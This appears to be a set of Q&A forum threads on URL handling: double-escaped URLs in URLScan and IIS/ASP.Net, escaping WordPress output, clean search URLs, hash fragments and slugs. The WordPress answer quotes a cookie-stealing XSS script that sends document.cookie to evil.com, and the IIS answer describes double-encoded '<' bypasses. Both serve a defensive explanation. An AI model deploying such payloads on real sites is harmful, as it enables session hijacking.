URLSCAN question - urlscan

I have URLScan installed on my Windows Server 2003 machine and it is blocking an older ColdFusion script. The log entry reads:
2008-09-19 00:16:57 1416208729 GET /Admin/Uploads/Mountain/Wolf%2520Creek%2520gazeebo.jpg Rejected URL+is+double+escaped URL - -
How do I get URLScan to allow requests like this without turning off the double-escaped URL feature?

To quote another post on the subject, "some aspect of your process for submitting URIs is doing some bad
I recommend changing the name of the JPG to not have spaces in it as a good practice, then later try to figure out with a non-production page why you're not interpreting the %20 as an encoded space, but as a percent sign and two digits.

"How do I get URLScan to allow submissions like this without turning off the double-escaped URL feature?"
How do you get it to allow double-escaped URLs without turning off the double-escaped url feature? I think there's something wrong with what you're trying to do. My question is this: does your HTML source literally show image requests with "%2520" in them? Is that the correct name for your file? If so, you really have only two options: rename the file or turn off the feature disallowing double escapes.
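To make the "%2520" in the log entry concrete, here is a minimal Python sketch of how a file name with spaces ends up double escaped. The helper name is_double_escaped is hypothetical, and its check (decode once, then see whether a second decode changes anything) only approximates the idea behind the rejection; it is not URLScan's actual implementation.

```python
from urllib.parse import quote, unquote

name = "Wolf Creek gazeebo.jpg"

# Encoding once turns each space into %20.
once = quote(name)

# Encoding the already-encoded name turns each '%' into %25,
# so %20 becomes %2520: the form that shows up in the log.
twice = quote(once)


def is_double_escaped(path):
    """Hypothetical check: a path is double escaped if decoding it a
    second time still changes it."""
    decoded = unquote(path)
    return unquote(decoded) != decoded


print(once)   # Wolf%20Creek%20gazeebo.jpg
print(twice)  # Wolf%2520Creek%2520gazeebo.jpg
print(is_double_escaped(once), is_double_escaped(twice))  # False True
```

If the page source really contains the %2520 form, something in the upload or rendering code is encoding the name twice, which is the thing to track down.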


Why must I escape data prior to rendering it for the end user in WordPress?

I understand why incoming data must be sanitized before it is saved to the database.
Why must I escape data I already have, prior to rendering it for the end user? If data originates from my own database and I have already validated and sanitized it, then surely it is already secure?
Because if you do not you could be making your site vulnerable to XSS.
Data is displayed to users via a combination of HTML and JavaScript. If you do not escape it, JavaScript supplied by a user could be output to the page and executed (rather than simply displayed, as it is on StackOverflow).
For example, data saved into your database may still contain JavaScript code within the HTML, such as <script>document.location="http://www.evil.com/?" + escape(document.cookie)</script>
This would redirect whichever user views the page to www.evil.com, passing along all cookies (which could include the user's session ID, compromising the session via session hijacking). However, this is often done in a more subtle fashion so that the user is not aware of being attacked, such as setting the URL of an <img> tag to pass along the cookies, or even embedding a keylogger within the page.
Escaping needs to be done per output context, so it must be done at output time rather than at input time. Examples of output contexts are HTML, JavaScript, and CSS, and they each have their own escaping (encoding) rules that must be followed to ensure your output is safe. For example, & in HTML is &amp; whilst in JavaScript it should be encoded as \x26. This ensures the character is interpreted by the language as a literal rather than as a control character.
Please see the OWASP XSS Prevention Cheat Sheet for more details.
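As a rough illustration of "escaping per output context", here is a minimal sketch in Python rather than WordPress's PHP, so the function names are assumptions and not WordPress APIs. The same stored value is escaped one way for an HTML body and another way for a JavaScript string literal.

```python
import html
import json


def escape_for_html(value):
    """Escape for an HTML text or attribute context (& becomes &amp;, etc.)."""
    return html.escape(value, quote=True)


def escape_for_js_string(value):
    """Escape for a JavaScript string literal inside a <script> block.

    json.dumps produces a quoted literal; the extra replacements encode
    <, > and & as \\x3c, \\x3e and \\x26 so the value cannot close the
    surrounding script tag or be read as HTML markup.
    """
    literal = json.dumps(value)
    return (literal.replace("<", "\\x3c")
                   .replace(">", "\\x3e")
                   .replace("&", "\\x26"))


stored = '<script>alert("x")</script> & more'
print(escape_for_html(stored))
print(escape_for_js_string(stored))
```

The point is that the stored value is the same in both cases; only the output context decides which encoding is correct, which is why it has to happen at render time.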
Escaping data you believe is safe may sound like a "belt and suspenders" kind of approach, but in an environment like WordPress you need to do it. It's possible a vulnerability in a third-party plugin or theme would let someone change the data in your database. And the plugin infrastructure means other code might have had the chance to modify your data before you go to render it in the theme. Filtering your output doesn't add any real overhead to rendering the page, starts to become natural to include in your code, and helps ensure you're not letting someone inject anything unwanted into your page.
It's not as huge of a risk as forgetting input validation (well okay maybe let's say "not as vulnerable to script kiddies but still a huge risk if you piss off someone smart"), but the idea is you want to prevent cross site scripting. This article does a nice job giving you some examples. http://www.securityninja.co.uk/secure-development/output-validation/

Concrete 5 search results page url

The Concrete 5 search results page URL contains some parameters. How can I remove those parameters and make the URL user friendly?
On an Apache server I recommend using the mod_rewrite module and its RewriteEngine.
With this module you can specify aliases for some internal URLs (of course with parameters as well). You can also use RegEx for this.
RewriteEngine on Wikipedia
mod_rewrite tutorial
Short answer: it's probably not worth the trouble.
Long answer...
I'm guessing you see three query parameters when using the search block:
The first parameter is required to make the searches work, but the other two can be dropped. When I build concrete5 themes, I usually "hard-code" the html for the search form, so that I can control which parameters are sent (basically, don't provide a "name" to the submit button, and don't include a "search_paths" hidden field).
The "query" parameter, though, is not going to be easy to get rid of. The problem is that for a search, you're supposed to have a parameter like that in the URL. You could work around this by using JavaScript: when the search form is submitted, use some jQuery to rewrite the request so it puts that parameter at the end of the URL (for example, http://example.com/search?query=test becomes http://example.com/search/test). Then, as @tuxtimo suggests, you add a rewrite rule to your .htaccess file to take that last piece of the URL and treat it as the ?query parameter that the system expects. But this won't work if the user doesn't have JavaScript enabled (and hence probably not for Googlebot either, which means that this won't really serve any SEO purpose, which I imagine is the real reason you're asking this question to begin with).
Also, you will run into a lot of trouble if you ever add another page under the page that you show the search results on (because you have the rewrite rule that treats everything after the top-level search page path as a search parameter -- so you can never actually reach an address that exists below that path).
So I'd just make a nice clean search form that only sends the ?query parameter and leave it at that -- I don't think those are really that much less user-friendly than /search-term would be.

Can anyone provide a good info on the various uses of hash(#) in urls?

I'm developing software that will provide in-depth information about URLs.
While the get-params are simple, I'm having trouble with the hash.
At first it was used to mark places in the document to navigate to, but we're past that now. I've seen JS engines using it to store params similar to the get strings.
So, here's my question: is everything that comes after a hash fair game, or are there any conventions about what it should look like?
Try these pages, they could help: "Fragment Identifier" on Wikipedia, or search Google for "Pound Sign".
They include a list of examples you could use.
It all depends on what you need. Hashes are used in modern web applications that make asynchronous calls to the server using Ajax. This allows the user, for example, to copy the link and receive the same content after pasting it (the actions taken are put into the hash, which changes a URL that would otherwise remain static).
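For a tool that inspects URLs, the two uses mentioned above (a plain document anchor versus query-string-like parameters kept in the hash) can be told apart with a simple heuristic. This is a minimal sketch: the function name describe_fragment and the "contains an equals sign" rule are assumptions for illustration, not an established convention.

```python
from urllib.parse import parse_qs, urlsplit


def describe_fragment(url):
    """Classify the part after '#' as absent, a plain anchor, or
    query-string-style parameters (heuristic: it contains '=')."""
    fragment = urlsplit(url).fragment
    if not fragment:
        return ("none", None)
    if "=" in fragment:
        # Applications that keep state in the hash often reuse the
        # key=value&key=value syntax of query strings.
        return ("params", parse_qs(fragment))
    return ("anchor", fragment)


print(describe_fragment("http://example.com/page#section-2"))
print(describe_fragment("http://example.com/app#view=list&page=3"))
print(describe_fragment("http://example.com/"))
```

Note that the fragment is never sent to the server, so any interpretation beyond "anchor" is entirely up to the client-side code of the site in question.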
You want to read http://www.jenitennison.com/blog/node/154

Allow Double URL Encoded Request Paths To Be Valid

I have a standard ASP.Net WebForms application running on IIS 7.0 with an Integrated Managed Pipeline. Many of the images on our site have spaces in their file names (e.g. './baseball drawing.gif'). When we place these images into our HTML pages we URL-encode the paths so that our img tags look like this: <img src='./baseball%20drawing.gif' />
Now, the problem comes in when certain search engines and web crawlers try to index our site. When they scrape our pages they URL-encode our already URL-encoded paths, producing image links like './baseball%2520drawing.gif', where %25 is the URL encoding for '%'. This causes two problems:
When users get results from these search engines they receive broken links.
When users attempt to navigate to these broken links it throws errors in our system.
As you can see, this is a lose-lose situation. Users get broken links, and we get noise in our error logs.
I've been trying to figure out how to correct this problem with no luck. Here is what I've tried:
Set <requestFiltering allowDoubleEscaping='true'> in web.config to prevent the "404.11 URL Double Escaped error". This fixed the first error but caused a new one, "a potentially dangerous Request.Path was found".
Removed the '%' from <httpRuntime requestPathInvalidCharacters> to prevent the "potentially dangerous Request.Path" error. This fixed the second error but now we have a third one, "Resource can't be found".
I placed a break in my code to watch Request.Path. It looks like it is right with a value of 'Ball Image.gif' instead of 'Ball%2520Image.gif'. With this being the case I'm not sure why it isn't working.
I feel like I have a super hack where I am having to disable everything without really understanding why nothing is working. So I guess my question is threefold:
Why did solution attempt 1 not take care of the problem?
Why did solution 2 not take care of the problem?
Why does my Request.Path look right in step 3 but it still doesn't work?
Any help anyone can provide would be greatly appreciated.
OK, after much searching of the internets and plenty of experimentation I think I finally understand what is going on. My main problem was a case of extreme confirmation bias. Everything I read said what I wanted to hear rather than what it actually said. I am going to summarize greatly the key points I needed to understand in order to answer my question.
First, I needed to understand that IIS and ASP.Net are two different applications. What IIS does in a nutshell is receive a request, route that request to an application that handles it, get the output from the handling application, and then send that output back to the requester. What ASP.Net does is receive the request from IIS, handle it, and then pass the response back to IIS. This is a huge over-generalization of the whole process but for my purposes here it is good enough.
Incoming ASP.Net requests have to pass through two gatekeepers: the IIS7 RequestFiltering module (configured in system.webServer/requestFiltering), and then the ASP.Net HttpRuntime request filters (configured in system.web/httpRuntime).
The IIS RequestFiltering module is the only one that normalizes incoming requests and it only applies normalization ONE time. Again I repeat it only applies it ONE time. Even if <requestFiltering allowDoubleEscaping="true" /> it will still only apply normalization once. So that means '%2520' will be normalized to '%20'. At this point if allowDoubleEscaping is false IIS will not let the request through since '%20' could still be normalized. If, however, allowDoubleEscaping is set to true then IIS7 will pass off the request '%20' to the next gatekeeper, ASP.Net. This was the cause of the first error.
The Asp.net filter is where the requestPathInvalidCharacters are checked. So now our '%20' is invalid because by default '%' is a part of requestPathInvalidCharacters. If we remove the '%' from that list we will make it through the second gatekeeper and ASP.Net will try to handle our request. This was the cause of the second error.
Now ASP.Net will try to convert our virtual path into a physical one on the server. Unfortunately, we still have a '%20' in our path instead of the ' ' we want, so ASP.Net isn't able to find the resource and throws a "resource can't be found" error. The reason the path looked right to me when I broke in my code is that I placed a watch on the Request.Url property. This property tries to be helpful by applying its own normalization in its ToString() method, thus making our %20 look like the ' ' we want even though it isn't. This was the cause of the final error.
To make this work we could write our own custom module that receives the request after the first two gatekeepers and fully normalizes it before handing it off to ASP.Net. Doing this though would allow any character to come through as long as it was URL encoded. For example, we normally don't want to allow a '<' or a '>' in our paths since these can be used to insert tags into our code. As things work right now the < and > will not get past the ASP.Net filter since they are part of the requestPathInvalidCharacters. However, encoded as a %253C and a %253E they can if we open the first two gates and then normalize the request in our own custom module before handing it off to ASP.Net.
In conclusion, allowing %2520 to be fully normalized can't be done without creating a large security hole. If it were possible to tell the RequestFiltering module to fully normalize every request it receives before testing that request against the first two gatekeepers then it would be much safer but right now that functionality isn't available.
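The two gatekeepers and the security hole can be modeled with a small Python sketch. This is a simplification of the behavior described above, not IIS or ASP.Net code: the function names are hypothetical, and the invalid-character set is what I believe the ASP.Net default for requestPathInvalidCharacters to be, so treat it as an assumption.

```python
from urllib.parse import unquote

# Assumed default for requestPathInvalidCharacters: < > * % & : \ ?
DEFAULT_INVALID_CHARS = set('<>*%&:\\?')


def iis_request_filtering(raw_path, allow_double_escaping):
    """Gatekeeper 1 (model): normalize exactly once, and reject the
    request if the result could still be normalized further."""
    once = unquote(raw_path)
    if not allow_double_escaping and unquote(once) != once:
        raise ValueError("404.11 URL double escaped")
    return once


def aspnet_path_check(path, invalid_chars):
    """Gatekeeper 2 (model): reject paths containing invalid characters."""
    if invalid_chars.intersection(path):
        raise ValueError("potentially dangerous Request.Path")
    return path


# Both gates opened: double escaping allowed and '%' removed from the list.
relaxed_chars = DEFAULT_INVALID_CHARS - {"%"}
passed = aspnet_path_check(
    iis_request_filtering("/img/a%253Cb.gif", allow_double_escaping=True),
    relaxed_chars,
)
print(passed)           # /img/a%3Cb.gif  (no literal '<' yet, so it passes)

# A custom module that now fully normalizes the path reintroduces '<'
# after both checks have already run.
print(unquote(passed))  # /img/a<b.gif
```

The '<' only appears after the last point at which it would have been rejected, which is the hole described above.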
If I got anything wrong let me know and I hope this helps somebody.
If you want to allow double-escaping, you can follow the instructions at
It worked for me on IIS 7.0 with no other configuration required. Double-escaping has no impact for the code of the web site I implemented it on; I don't know what potential security implications there could be for other sites.

How should I sanitize urls so people don't put 漢字 or á or other things in them?

How should I sanitize urls so people don't put 漢字 or other things in them?
EDIT: I'm using Java. The URL will be generated from a question the user asks on a form. It seems StackOverflow just removes the offending characters, but it also turns an á into an a.
Is there a standard convention for doing this? Or does each developer just write their own version?
The process you're describing is slugify. There's no fixed mechanism for doing it; every framework handles it in their own way.
Yes, I would sanitize/remove. It will either be inconsistent or look ugly encoded
Using Java see URLEncoder API docs
Be careful! If you are removing elements such as odd chars, then two distinct inputs could yield the same stripped URL when they don't mean to.
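Here is a minimal sketch of one common slugify approach, along with the collision that the warning above describes. It is written in Python for brevity; in Java, java.text.Normalizer offers the same Unicode decomposition step. The function name slugify and the exact rules (lowercase, hyphens between runs of letters and digits) are assumptions, since every framework does this slightly differently.

```python
import re
import unicodedata


def slugify(title):
    """Turn a title into an ASCII slug.

    NFKD decomposition splits 'á' into 'a' plus a combining accent; the
    ASCII encode step then drops the accent, along with characters such
    as 漢字 that have no ASCII decomposition at all.
    """
    decomposed = unicodedata.normalize("NFKD", title)
    ascii_only = decomposed.encode("ascii", "ignore").decode("ascii")
    return re.sub(r"[^a-z0-9]+", "-", ascii_only.lower()).strip("-")


print(slugify("How do I sanitize á?"))  # how-do-i-sanitize-a
print(slugify("漢字 in URLs"))           # in-urls

# Two distinct titles, one slug: the slug alone cannot identify a page.
print(slugify("What is á?") == slugify("What is a?"))  # True
```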
The specification for URLs (RFC 1738, Dec. '94) poses a problem, in that it limits the use of allowed characters in URLs to only a limited subset of the US-ASCII character set
This means it will get encoded. URLs should be readable. Standards tend to be English biased (what's that? Langist? Languagist?).
Not sure what the convention is in other countries, but if I saw tons of encoding in a URL sent to me, I would think it was stupid or suspicious ...
Unless the link is displayed properly, encoded by the browser and decoded at the other end ... but do you want to take that risk?
StackOverflow seems to just remove those chars from the URL altogether :)
StackOverflow can afford to remove the characters because it includes the question ID in the URL. The slug containing the question title is for convenience, and isn't actually used by the site, AFAIK. For example, you can remove the slug and the link will still work fine: the question ID is what matters and is a simple mechanism for making links unique, even if two different question titles generate the same slug. Actually, you can verify this by trying to go to
and it will just take you back to this
Thanks Mike Spross
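The "ID plus decorative slug" scheme from the quote can be sketched as follows. The /questions/<id>/<slug> layout mirrors what StackOverflow URLs look like, but the function names and the routing regex are assumptions for illustration only.

```python
import re


def question_url(question_id, slug):
    """Build a link whose uniqueness comes from the ID, not the slug."""
    return f"/questions/{question_id}/{slug}"


def question_id_from_path(path):
    """Resolve a path to a question ID, ignoring whatever slug follows
    (or whether one is present at all)."""
    match = re.match(r"^/questions/(\d+)(?:/[^/]*)?/?$", path)
    return int(match.group(1)) if match else None


# Colliding slugs are harmless because the IDs differ.
print(question_url(101, "what-is-a"))
print(question_url(102, "what-is-a"))

# With or without a slug, the same question is found.
print(question_id_from_path("/questions/101/what-is-a"))  # 101
print(question_id_from_path("/questions/101"))            # 101
```

A site using this scheme would typically redirect to the canonical slug after the lookup, but that step is left out here.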
Which language are you talking about?
In PHP I think this is the easiest and would take care of everything:
